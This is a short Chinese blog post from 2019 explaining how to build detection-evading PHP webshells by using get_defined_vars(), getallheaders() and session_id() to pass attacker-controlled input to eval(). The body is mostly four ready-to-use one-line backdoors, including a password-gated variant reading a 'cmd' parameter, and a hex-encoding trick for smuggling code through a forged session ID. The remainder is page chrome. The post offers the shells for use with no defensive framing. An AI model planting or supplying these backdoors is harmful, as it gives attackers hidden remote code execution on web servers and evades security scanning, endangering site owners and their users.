PHP利用Apache、Nginx的特性实现免杀Webshell

一些小笔记
19年2月14日
编辑

纯七站长

get_defined_vars()、getallheaders()是两个特性函数，我们可以通过这两个函数来构造我们的webshell。

环境	函数	用法
nginx	get_defined_vars()	返回由所有已定义变量所组成的数组
apache	getallheaders()	返回由所有已定义变量所组成的数组

apache环境

<?php
eval(next(getallheaders())); 
?>

PHP利用Apache、Nginx的特性实现免杀Webshell

apache和nginx环境通用

<?php
eval(implode(reset(get_defined_vars())));
?>

PHP利用Apache、Nginx的特性实现免杀Webshell

另外一种通过执行伪造的sessionid值，进行任意代码执行。

<?php
eval(hex2bin(session_id(session_start())));
?>

PHP利用Apache、Nginx的特性实现免杀Webshell

706870696e666f28293b这个是phpinfo();的hex编码。

给shell加密码

<?php eval(get_defined_vars()['_GET']['cmd']);?>

一些小笔记

NGINX编译安装及主机配置分离

2019-2-8 12:50:41

一些小笔记

web容器上传文件利用方式总结

2019-2-14 1:28:40

0 条回复 A文章作者 M管理员

更换删除

暂无讨论，说说你的看法吧

1

强国助手 v2.22 使用文档（停止维护）
21年5月12日
2

纯七影视发布页-产品文档
22年2月27日
3

记一次官网删库恢复事件
20年3月5日
4

祝前程繁华似锦
19年8月11日
5

各大网站URL收录提交地址分享
18年1月29日
6

水文
19年9月8日

来自：

❯

个人中心

购物车

优惠劵

今日签到

有新私信私信列表

搜索

客服

扫码打开当前页

返回顶部

幸运之星正在降临...

点击领取今天的签到奖励！

恭喜！您今天获得了{{mission.data.mission.credit}}积分

今日签到

连续签到

{{item.credit}}

连续{{item.count}}天

查看所有

我的优惠劵

_￥_优惠劵

使用时效：无法使用

使用时效：
之前

使用时效：永久有效

优惠劵ID：
×

限制以下商品使用：限制以下商品分类使用：不限制使用：

[{{ct.name}}]

所有商品和商品类型均可使用

没有优惠劵可用!

购物车

×

删除

购物车空空如也!

清空购物车前往结算

您有新的私信

没有新私信

写新私信查看全部